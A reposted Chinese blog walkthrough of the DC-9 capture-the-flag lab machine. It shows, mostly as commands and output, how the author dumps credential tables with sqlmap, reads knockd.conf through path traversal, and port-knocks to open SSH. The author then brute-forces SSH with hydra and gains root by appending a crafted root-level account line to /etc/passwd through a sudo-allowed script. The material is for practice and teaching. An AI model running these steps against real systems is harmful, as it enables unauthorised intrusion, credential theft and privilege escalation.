渗透测试：靶机DC-9练习实录

转载

mob604756f80175 2021-09-01 09:28:00

DC-9打靶记录

一、信息收集

# arp-scan -l
# nmap -A -p- 10.0.0.28
# 结果没什么有意思的事儿，也就不复制到这里啦。

二、BurpSuite扫描发现有SQL注入漏洞

渗透测试：靶机DC-9练习实录_kali

三、接下来用SQLmap

在BurpSuite中找到results.php页面，然后在Request部分右键->Copy to file，存贮为一个txt文件（dc-9.txt)

渗透测试：靶机DC-9练习实录_用户名_02

接下来就可以用sqlmap了。

┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt --dbs  
# 结果很多，有用的就这几行
available databases [3]:
[*] information_schema
[*] Staff
[*] users
# 先搞下Staff
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff --tables
[03:15:06] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff -T Users --columns
[03:17:01] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff -T Users -C Username,Password --dump 
# 这里一定要注意Username,Password之间不能有空格
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
# 网上md5解密：transorbital1  
# 有很多网站：https://www.somd5.com/
# 经过测试可以登录网站后台，可似乎也没能发现什么。那再搞一下users库
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users --tables
[03:29:21] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users -T UserDetails --columns
[04:08:41] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+
┌──(root????kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users -T UserDetails -C username,password --dump
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+
# 虽然搞出来不少东西，但不知道怎么用。SSH好像也被过滤了。

四、重新回到网站，仔细寻找

渗透测试：靶机DC-9练习实录_用户名_03

根据底部的信息File does not exist，可以推断，有可能存在文件包含漏洞。经过百度，可以知道有个敲门打开SSH端口的事情。（这个又是个新东西）
通过查看../../../../etc/knockd.conf文件，结合搜索到的相关知识，知道用nc分别去尝试这三个端口可以打开SSH端口

┌──(root????kali)-[~/game/dc-9]
└─# nc 10.0.0.28 7469                                                                                 
(UNKNOWN) [10.0.0.28] 7469 (?) : Connection refused
┌──(root????kali)-[~/game/dc-9]
└─# nc 10.0.0.28 8475                                                                                 (UNKNOWN) [10.0.0.28] 8475 (?) : Connection refused
┌──(root????kali)-[~/game/dc-9]
└─# nc 10.0.0.28 9842                                                                                 (UNKNOWN) [10.0.0.28] 9842 (?) : Connection refused
┌──(root????kali)-[~/game/dc-9]
└─# nmap -A -p- 10.0.0.28                                                                             
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 04:04 EDT
Nmap scan report for 10.0.0.28
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

接下来就可以利用找出来的一堆用户名和密码了。分别将这些东西保存到两个文件中：user.txt和pass.txt中。这时候VIM中的块操作能省不少时间。甚至可以考虑用一下linux中的三个神器：sed grep gawk。可惜还不会用。保存好后，就可以请出hydra了。注意：一个用户名一行，一个密码一行，用户名和密码分别存两个不同的文件。

┌──(root????kali)-[~/game/dc-9]
└─# hydra -L user.txt -P pass.txt 10.0.0.28 ssh     
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.0.28   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.0.28   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
# 真是越玩越觉得神奇，这些linux命令的简洁高效在这里得到了完美的体现。

五、到这里就可以愉快地SSH进目标主机了

# 原来我高兴的太早了，这三个用户家目录下什么也没有。ls后什么也显示不出来。后来，上网搜索后才发现他的文件加上了隐藏属性。最基本的一些东西，我给忘掉了。
janitor@dc-9:~$ ls -al
total 20
drwx------  4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
-rw-r--r--  1 janitor janitor    6 Aug 31 18:42 test.txt
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
#将上述几个密码加入到上面的pass.txt中，再次运行hydra
┌──(root????kali)-[~/game/dc-9]
└─# hydra -L user.txt -P pass.txt 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:50:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28   login: fredf   password: B4-Tru3-001
[22][ssh] host: 10.0.0.28   login: joeyt   password: Passw0rd
[STATUS] 356.00 tries/min, 356 tries in 00:01h, 40 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-31 04:51:26
# 又可以发现一个账户fredf
fredf@dc-9:/home/janitor/.secrets-for-putin$ cd ~
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
# 用fredf账户登录后，可以发现他具有一个特殊权限，可以运行一个test脚本。
fredf@dc-9:~$  /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredf@dc-9:~$ 
# 这个test的作用就是把一个文件中的内容append到另一个文件中。我们首先想到利用test往passwd文件中写入用户信息，便这个用户口令必须是加密过的。必须按以下方式处理后写入后才有效。
fredf@dc-9:~$ openssl passwd -1 -salt xl zylee
$1$xl$Qr4AkYPDjDkVDlixUxrcZ.
fredf@dc-9:~$ echo 'xl:$1$xl$Qr4AkYPDjDkVDlixUxrcZ.:0:0::/root:/bin/bash'>/tmp/xl
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/xl /etc/passwd
fredf@dc-9:~$ su xl
Password: 
root@dc-9:/home/fredf# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

本文章为转载内容，我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题，欢迎原作者联系我们进行内容更正或删除文章。